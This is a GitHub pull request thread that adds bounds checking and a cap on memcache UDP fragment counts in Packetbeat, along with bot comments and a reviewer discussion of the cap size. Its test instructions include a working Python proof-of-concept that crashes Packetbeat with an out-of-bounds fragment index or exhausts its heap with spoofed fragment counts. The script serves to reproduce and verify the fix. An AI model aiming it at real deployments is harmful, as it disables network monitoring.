[packetbeat] memcache udp bounds checking

[nicholasberlin]

Proposed commit message

packetbeat: verify and cap memcache udp fragment counts

Checklist

• My code follows the style guidelines of this project
• I have commented my code, particularly in hard-to-understand areas
• I have made corresponding changes to the documentation
• I have made corresponding change to the default configuration files
• I have added tests that prove my fix is effective or that my feature works. Where relevant, I have used the stresstest.sh script to run them under stress conditions and race detector to verify their stability.
• I have added an entry in ./changelog/fragments using the changelog tool.

How to test this PR locally

1. Compile packetbeat

cd /opt/beats
go build -C packetbeat -o /usr/local/bin/packetbeat

2. Run packetbeat

packetbeat -e -c packetbeat_memcache_udp.yml

3. Run the following script to trigger the issue:

#!/usr/bin/env python3
"""Send crafted memcache UDP datagrams to trigger Packetbeat bugs."""
import argparse
import socket
import struct
import time


def send_crash(sock, host, port):
    # requestID=0x4242, seqNumber=5, numDatagrams=2 -> out-of-bounds
    header = struct.pack(
        ">HHHH",
        0x4242,  # requestID
        5,       # seqNumber > numDatagrams
        2,       # numDatagrams
        0,
    )
    sock.sendto(header + b"A", (host, port))


def send_spray(sock, host, port, count):
    header = struct.pack(
        ">HHHH",
        0x5151,
        0,
        65535,
        0,
    )
    payload = b"B"
    for i in range(count):
        sock.sendto(header + payload, (host, port))
        time.sleep(0.05)


def main():
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument("--host", default="127.0.0.1")
    parser.add_argument("--port", default=11211, type=int)
    parser.add_argument(
        "--mode",
        choices=["panic", "spray"],
        default="panic",
        help="panic sends OOB fragment index; spray exhausts heap",
    )
    parser.add_argument(
        "--spray-count",
        type=int,
        default=10,
        help="number of allocations to attempt in spray mode",
    )
    args = parser.parse_args()

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        if args.mode == "panic":
            send_crash(sock, args.host, args.port)
        else:
            send_spray(sock, args.host, args.port, args.spray_count)
    finally:
        sock.close()


if __name__ == "__main__":
    main()

python3 scripts/trigger_memcache_udp.py --mode panic

[github-actions]

🤖 GitHub comments

Just comment with:

• run docs-build : Re-trigger the docs validation. (use unformatted text in the comment!)

[mergify]

This pull request does not have a backport label.
If this is a bug or security fix, could you label this PR @nicholasberlin? 🙏.
For such, you'll need to label your PR with:

• The upcoming major version of the Elastic Stack
• The upcoming minor version of the Elastic Stack (if you're not pushing a breaking change)

To fixup this pull request, you need to add the backport labels for the needed
branches, such as:

• backport-8./d is the label to automatically backport to the 8./d branch. /d is the digit
• backport-active-all is the label that automatically backports to all active branches.
• backport-active-8 is the label that automatically backports to all active minor branches for the 8 major.
• backport-active-9 is the label that automatically backports to all active minor branches for the 9 major.

[elasticmachine]

Pinging @elastic/sec-linux-platform (Team:Security-Linux Platform)

[stanek-michal]

LGTM but change max fragments to 1024

[stanek-michal]

hope it won't be too small, I think we can keep 64

[stanek-michal]

I'm thinking there's no reason to cap it that small. We should cap it to 1024 instead, then all messages will fit from what I see (default max item size is 1MB or so so 1024 fragments cover it)

[nicholasberlin]

sounds good to me: 7327283